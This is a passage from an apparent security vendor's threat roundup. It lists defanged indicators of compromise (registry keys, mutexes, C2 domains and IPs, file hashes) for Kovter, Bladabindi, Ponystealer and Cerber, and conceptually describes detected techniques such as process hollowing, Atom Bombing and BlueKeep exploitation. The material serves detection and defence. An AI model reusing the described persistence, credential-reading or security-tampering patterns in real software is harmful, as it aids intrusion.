da93ffcafad1569fd94cb5bae72a876bf6e021b7ad30b4d644a99ceb88651bc6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-essWD6jQn98/XkbkvQMAvWI/AAAAAAAADSo/bh8oOsTllLUEQwUn1IophA4XDimJYhOyACLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-XUwmAjmy9ew/XkbkzJwdRGI/AAAAAAAADSs/xPUmGpebw9w7DDIYT8tr5woLymKe-hbrQCLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-pnZSPvSBJmk/Xkbk33ih9QI/AAAAAAAADSw/bO3pg221ueYN8fpJxUqsIARE5fAeurJjACLcBGAsYHQ/s1600/1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Kovter-7581113-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE ` | 15 \n`<HKCR>\\.8CA9D7 ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eed5bf47 ` | 15 
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: edfc5b63 ` | 15 \n`<HKCR>\\C3B61 ` | 15 \n`<HKCR>\\C3B61\\SHELL ` | 15 \n`<HKCR>\\C3B61\\SHELL\\OPEN ` | 15 \n`<HKCR>\\C3B61\\SHELL\\OPEN\\COMMAND ` | 15 \n`<HKCR>\\.8CA9D7 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: ffcfae7b ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: ffcfae7b ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 78758f10 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 78758f10 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: c3ab6058 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: c3ab6058 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8567f942 ` | 15 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 15 \n`A83BAA13F950654C` | 15 \n`Global\\7A7146875A8CDE1E` | 15 \n`B3E8F6F86CDD9D8B` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`162[.]59[.]22[.]216` | 1 \n`203[.]220[.]231[.]209` | 1 \n`35[.]30[.]2[.]211` | 1 \n`65[.]168[.]33[.]91` | 1 \n`65[.]23[.]68[.]193` | 1 \n`8[.]111[.]224[.]146` | 1 \n`190[.]95[.]112[.]80` | 1 \n`17[.]163[.]64[.]9` | 1 \n`75[.]177[.]69[.]90` | 1 \n`166[.]105[.]213[.]36` | 1 \n`214[.]63[.]237[.]80` | 1 \n`36[.]91[.]76[.]70` | 1 \n`106[.]70[.]177[.]221` | 1 \n`16[.]191[.]214[.]15` | 1 \n`58[.]13[.]27[.]49` | 1 \n`192[.]86[.]250[.]64` | 1 \n`126[.]167[.]218[.]58` | 1 \n`15[.]150[.]185[.]79` | 1 \n`136[.]59[.]133[.]35` | 1 \n`14[.]24[.]198[.]67` | 1 \n`60[.]255[.]136[.]37` | 1 \n`35[.]118[.]226[.]214` | 1 \n`39[.]29[.]235[.]49` | 1 \n`154[.]111[.]27[.]104` | 1 \n`166[.]82[.]242[.]42` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]litespeedtech[.]com` | 1 \n`schema[.]org` | 1 \n`api[.]w[.]org` | 1 \n`gmpg[.]org` | 1 \n`pinterest[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`bugs[.]debian[.]org` | 1 \n`www[.]anrdoezrs[.]net` | 1 \n`shareasale[.]com` | 1 \n`help[.]smartertools[.]com` | 1 \n`www[.]smartertools[.]com` | 1 \n`www[.]pntrs[.]com` | 1 \n`cdn10[.]bigcommerce[.]com` | 1 \n`cowgirldelight[.]com` | 1 \n`lppool[.]catalogsites[.]net` | 1 \n`www[.]rods[.]com` | 1 \n`checkspressions[.]com` | 1 \n`www[.]womensbootshop[.]com` | 1 \n`www[.]cssigniter[.]com` | 1 \n`passets-cdn[.]pinterest[.]com` | 1 \n`www[.]pntra[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\4dd3c` | 15 \n`%LOCALAPPDATA%\\4dd3c\\519d0.bat` | 15 \n`%LOCALAPPDATA%\\4dd3c\\8e986.8ca9d7` | 15 \n`%LOCALAPPDATA%\\4dd3c\\d95ad.lnk` | 15 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\91b4e.lnk` | 15 \n`%APPDATA%\\b08d6` | 15 \n`%APPDATA%\\b08d6\\0b3c0.8ca9d7` | 15 \n \n#### File Hashes\n\n` 0bc765c9bdad7dea5fee981fa1ea3e39d39b43110991be6767062b5b3e04f72c 127fb45d6030c7ccccee832b5ce576786dbaae5df9b56894b69257e5217e294a 2ae6974b7efe312d521686e6852eeb699f2a73775742736b85b597e0ef3aa431 2fc52ad46802099597893005722950b74ac8625908227d1127a00666c4b335b9 30814d58a34c1f93bca33a91dff01df3d51d79652e03ee1d4268d4f3731c32e2 37ead0eac4578acd43bca94f7c952ca0ba292501902f3c24e2867d4c76987394 7271bdf260d1c23f06c6900ae8627662ae10029d1807128307bdfdaf216ec717 797903efd668c3b3f81419f0f14ed2c1877f051b237ca186f17559a536334d5c 7acad96af327bcdb132c8050fc85323173ac58b1efe91cadb529d2f9b4d98b27 82a312a0219ad8597a6d23b707103bbc5e5ba5a8f05754bf2c4904d857cd4c17 ab0bd0ecb30c8097d5270d8f4a093587dc92ac8b129a169c0488d74ad8a67037 b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806 b7e3127dc7f2729513628861b8ee60609a1c20eedcd9b6551314dd0eeedd817e beaa66c363f78e7bae7d9e16fdfaa2bad12a568db71f59a87ecfb675e8fef110 
cef415b47d807cb26e0881d6d79ac1ab4cbb77e1671cdcb5804982309481a18d `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-rHmOGYUnn3s/XkblI9uCPbI/AAAAAAAADTA/hTPnFRS2Is41M-ewgT-M8IsL59hsFItgwCLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-7yDofoCL-Fs/XkblNUumwAI/AAAAAAAADTE/BxQtrDXc0y4VUTtwioNP4Kxhg7C8kP9NACLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### PUA.Win.Trojan.Bladabindi-7581164-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 17 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 17 \n`<HKCU>\\SOFTWARE\\7261D3F24AE2C8DCAF22FAF7FCF1CAFD ` | 17 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd ` | 17 \n`<HKCU>\\SOFTWARE\\7261D3F24AE2C8DCAF22FAF7FCF1CAFD \nValue Name: [kl] ` | 17 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 17 \n`7261d3f24ae2c8dcaf22faf7fcf1cafd` | 17 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`shareefboy[.]ddns[.]net` | 17 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\x.vbs` | 16 \n`%TEMP%\\server.exe` | 17 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs` | 16 \n`\\423002248.exex (copy)` | 1 \n`%TEMP%\\server.exex (copy)` | 17 \n \n#### File Hashes\n\n` 00cf99575699bc66ebbb6420a94c31ed8acad4107031546e04f9576546c276e5 245938f3b18f371c90e5403b454cadfa791d97767d9aa05439d6b852fbffd714 285cb077ca516c336a1636182069e7cf9a8a057a267efa376ebede4c0a2cd0bf 29dba26459bba5b186f1bf1c0a0fffc0e393a6d4cc427c842a4aee0353518a2c 2de7a2aa518ea9e0fbc421761c85be589c27c88c3038fa4fa93bef51bacd67bd 344204f0902906b808c5f81ae62b455a3d0ded3034fca548230cd51c59f02ec4 388bfe746f61ade70292f8740d1c92c6eceaa21baa5e04de0ebc012dbed312e7 66d6a4049df4e8bc2fd9c615af0bc3d0ae715ea5b17c5222980f67bd6d57d75e 7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28 8e7ea6439f856525f2affc885f93a23e2f7ade71aecc69c8cd78e5460d4aa58b ae078923fc539c22a7eff4491301ae2c8f438e79a02226e6604b7035aff34ec5 aee215905b39a4a4cc85be54bda2ae9ded42e06fe0b3813a1794052a12e09757 c7a9a427985e84f296370c466eb675ff01b06992416ac9250c385cfaa5a9678d d2af08616f7d2dc0f68d75376d3164867732871348c8101aa0319c90062f999b d75a26758530f775943a9d16680ee4c37e913ab20d6953e965ae41f3e5fd3a88 d7ec97fb65437711f6dd0ce71e8cab70946d2c8f51566446a8fe8e8b64cbda62 fd05573a8360e8054c0ebc38c5cdd107e68b9694525829e832a3085c7d9a556b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-W5F1RN8Tm7I/Xkblcv7o31I/AAAAAAAADTM/tWcW6CL0BuE_G9-sU9ew3Pe1cB9SjFz-wCLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ySnPmdkZ4R0/XkblhtE_bmI/AAAAAAAADTU/SW1w7x44-dYrOt3fVXzasbj_YktfYNZnACLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Ponystealer-7581286-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 17 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 17 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`194[.]4[.]56[.]252` | 17 \n`212[.]129[.]7[.]131` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`myp0nysite[.]ru` | 17 \n`streetcode3[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\filename.vbe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\filename.vbe` | 17 \n`%APPDATA%\\subfolder` | 17 \n`%APPDATA%\\subfolder\\filename.bat` | 17 \n`%TEMP%\\811953.bat` | 1 \n`%TEMP%\\-1509909074.bat` | 1 \n \n#### File Hashes\n\n` 13400f8d7c8a12d8958a46992e9eed2b2f1151ae33fcd0c248bc35e58cfb7ce5 182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0 2c20c1f5d4995dcccf424f00ceb0ed472cb4565ee7b06c9cb70b08b478eaf2f1 2deca9e99719e851fd53cee5ac5dfbd07b119bc707b7aa81cb55c38c8883a772 3182728acec97bc151ebae0a6adfac92ab26acf0c5aa1ab5194926b5e36f4d43 5a4373916b36d08a40753dbcdac9f5a4463ce04e34c9d91370ed3eb26d9e02ee 73ef9e3fd88857d97750893acb03308bb1deb980ca8ca601087bb9a1f74362a6 8dfce3b2ccb67e4d7fe864898a1464f74a536e14bd4104dff9de8c399d42c2b7 8fe9aeaa722e13e842520e578ed099670bc59c882b59a6fb413dc6fcf590665a 955b6ea1a4087486a22b60ca2453343b04ac01e5c161615b13fd8bd22192c76d 
9a10bb237ac45ffee5878cdfe094a0b0f6f81d9eba8ec21033b8020391c1324f bd4aa94a35201221e31df703e1140180c8f310ce7f08b81960185a2b784a98c0 ce3e0e36ac012f0f464181de7a21c87bfa1c5c334a11b7569ddb5dd4222c95e6 d07112d2911677ee1e1722bd168dff54d480c3ce8a9f78a84bf3339a885b0174 e2546be50a578b421d55de25bb7d7aff0ef84b5246d1d7d6f8ca8908da415ef4 e48083bef42265f0c16b3cb6fef65a4206f152b3cfdb28f517e15ca8a660ffed fe83421fb5c10e194127d3b3d02e4bf2d1d951291bd935641d80f19bbf6ba620 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZzGH1lfQaOM/Xkbl1DWh3cI/AAAAAAAADTg/5TealMCAQCwGV1Zr6ljcNU2rdZHiVw1ZACLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-61hbPOtrq-I/Xkbl5sOFfsI/AAAAAAAADTk/0gll55PTzw8pVUvAL9kP9MMil-bAEgOKwCLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-fPRNlwGrXtI/Xkbl_YvhU1I/AAAAAAAADTo/bpbeNHbR40kZwAtGk5U5wxxoMD39ioBIACLcBGAsYHQ/s1600/816593fbb5469d27ac05c4eeaed262ce5486ceef3aa50f6a5991dbf87e0b6e29_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7582361-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: TileWallpaper ` | 7 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: WallpaperStyle ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES \nValue Name: DefaultTokenId ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 6 
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: {32382BC4-48A5-6DE8-F0EE-B8109DEC3228} ` | 2 \nMutexes | Occurrences \n---|--- \n`shell.{<random GUID>}` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`13[.]107[.]21[.]200` | 2 \n`204[.]79[.]197[.]200` | 3 \n`15[.]49[.]2[.]0/27` | 8 \n`122[.]1[.]13[.]0/27` | 8 \n`194[.]165[.]17[.]0/25` | 8 \n`95[.]213[.]195[.]123` | 2 \n`91[.]142[.]90[.]61` | 7 \n`31[.]41[.]47[.]50` | 5 \n`31[.]41[.]47[.]31` | 1 \n`195[.]19[.]192[.]99` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`maxcdn[.]bootstrapcdn[.]com` | 1 \n`get[.]adobe[.]com` | 4 \n`en[.]wikipedia[.]org` | 14 \n`www[.]torproject[.]org` | 7 \n`www[.]collectionscanada[.]ca` | 7 \n`alpha3[.]suffolk[.]lib[.]ny[.]us` | 7 \n`www[.]archives[.]gov` | 7 \n`www[.]vitalrec[.]com` | 7 \n`www[.]cdc[.]gov` | 7 \n`hldsfuh[.]info` | 1 \n`mmteenijjjuyoqju[.]info` | 1 \n`ydgsjrjqotlffitfg[.]org` | 1 \n`dxpmkdipp[.]info` | 1 \n`cojkhmdxrwvxwxa[.]pw` | 1 \n`qgilcuym[.]org` | 1 \n`www[.]multicounter[.]de` | 9 \n`pqhwfeeivtkxi[.]click` | 5 \n`othcijmuhwb[.]pl` | 4 \n`iconhrdqmeueg[.]su` | 2 \n`cdwguymjxnyot[.]pl` | 3 \n`veiqvqirdhmyis[.]org` | 4 \n`qoaouhgwfy[.]biz` | 2 \n`hkwyfnevdievebgjx[.]xyz` | 2 \n`ligumssfsrtfpy[.]xyz` | 4 \n`rqtcmltkurtev[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Contacts\\Administrator.contact` | 15 \n`%TEMP%\\d19ab989\\4710.tmp` | 8 \n`%TEMP%\\d19ab989\\a35f.tmp` | 8 \n`\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\_14-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\_15-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\_16-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\_17-INSTRUCTION.html` | 7 \n`\\MSOCache\\All 
Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\_18-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\_19-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\_20-INSTRUCTION.html` | 7 \n`%ProgramData%\\Adobe\\Updater6\\_21-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\_22-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\_24-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\_26-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\_25-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\_28-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\_27-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\IlsCache\\_29-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Network\\Downloader\\_46-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\_45-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\_48-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\PublishedData\\_44-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\StateData\\_41-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\Default Pictures\\_33-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\_34-INSTRUCTION.html` | 7 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906 085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96 14f9231bd987060133bc1e2908a9a5691e829d6f2cc43010f943e4070b0102cf 
2f5776b368011a76db2c690252846d0e3a90ccd27d9575e015663cebaf58db23 5815f647ad348de649c3ebfb5f1987e305410855cc944d14b1284abaaa40d9e3 593ead1c717d2ca3ed32fa98da70f4df7e0a99431d0327fc08c363621afc1fbe a515545e6056e1a9f75a4f7d0afefb54bf7e1ffb1e5f7f6641cece38db7e6cf0 bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a c11b9d1ba0badcc063eb6e60894b7f4f0932e4f73d037f05e06c80d72833b328 c4cfc1a33b5e956376c773674c1a8baa318832f2d75fac9efe53fbc895ace7da cb73396e304937a404c63ad696c6e2d269f38d8082d636e2c16e550f1f7cb118 cd8b407e19e2d93dfc939cd04e3a43100d2442128f42c226ac1dedeba0da4824 d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39 d6e35e20d5b7fa3d0b5352b4953701cabb4ed2a83d94dc666ef9900b7c53394a d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2 d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a fd1e8a916fa218df73894c59784dc94cbd26c7c7a5e1c1ee37ce45b349e4cc2c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZnBq2sVehBU/XkbmO3anDII/AAAAAAAADT0/wj80al3dA3Ajcuw_6SUUQGjAbQBgazCKwCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Dcj1XBW55ao/XkbmSCbeXFI/AAAAAAAADT8/pnsmYG6HaCEaZmf3NOYrkEwtxv19k74ngCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ex3DbvgX5Ow/XkbmWdet0wI/AAAAAAAADUA/_sFoL3ZJzrMq-GDxOkYCpFiKfjXbT52XgCLcBGAsYHQ/s1600/d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39_umbrella.png>)\n\n \n\n\n#### 
Malware

[Screenshot: 0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906_malware.png](<https://1.bp.blogspot.com/-jLsjhr0_epY/Xkbmb2rgrAI/AAAAAAAADUE/klXR0xSE4z0KByVybr4Jm2WbNY_XVV7RQCLcBGAsYHQ/s1600/0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906_malware.png>)

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps defend endpoints from the memory-based attacks commonly used by obfuscated malware and exploits. These techniques are designed to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, which also provide protection against zero-day vulnerabilities.

**CVE-2019-0708 detected (4662)**

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a use-after-free in the kernel-mode Remote Desktop Protocol (RDP) driver that can be triggered by sending a specially crafted RDP request. Because it is reachable before authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

**Excessively long PowerShell command detected (749)**

A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

**Kovter injection detected (319)**

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. It is fileless: the malicious payload is stored in the Windows registry and loaded directly into memory by a PowerShell stage rather than from an executable on disk. The Win.Trojan.Kovter-7581113-1 indicators earlier in this post show the matching persistence pattern: a custom file extension registered under HKCR (`.8CA9D7`) with its own `shell\open\command` handler, a file with that extension under `%LOCALAPPDATA%`, a `.lnk` in the Startup folder, and Run-key values with random hexadecimal names. Kovter can detect and report the use of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

**Process hollowing detected (206)**

Process hollowing is a technique used by some programs to avoid static analysis. A legitimate process is started in a suspended state, its original image is unmapped from memory and replaced with the parent's unpacked (previously obfuscated or encrypted) payload, and the main thread is then resumed, so the malicious code runs under the name and path of a benign executable.

**Gamarue malware detected (188)**

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. The Win.Packed.Gamarue-7580018-0 indicators above show its defensive tampering: the `Start` values of the Security Center (`wscsvc`), Windows Defender (`WinDefend`), Windows Firewall (`MpsSvc`) and Windows Update (`wuauserv`) services are modified, along with `EnableLUA` and the Explorer `Hidden`/`ShowSuperHidden` settings, and notification-area health alerts are suppressed (`HideSCAHealth`, `TaskbarNoNotification`).

**Atom Bombing code injection technique detected (133)**

A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer; when placed in the global Atom table they are accessible from every process. Malware exploits this by storing shellcode as a global Atom and then queuing an Asynchronous Procedure Call (APC) to a thread in the target process; the APC function retrieves the Atom's contents into the target's memory, where the shellcode is then executed. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.

**Installcore adware detected (105)**

InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising as pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

**Dealply adware detected (75)**

DealPly is adware that claims to improve your online shopping experience. It is often bundled into otherwise legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.

**Reverse http payload detected (30)**

An exploit payload intended to connect back to an attacker-controlled host over HTTP has been detected.

**Corebot malware detected (20)**

Corebot is a Trojan with many of the capabilities found in other prominent families. It features a plugin system that lets it load a variety of features from the C2 server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as intercepting and modifying browser communications to steal data, especially data related to banking.

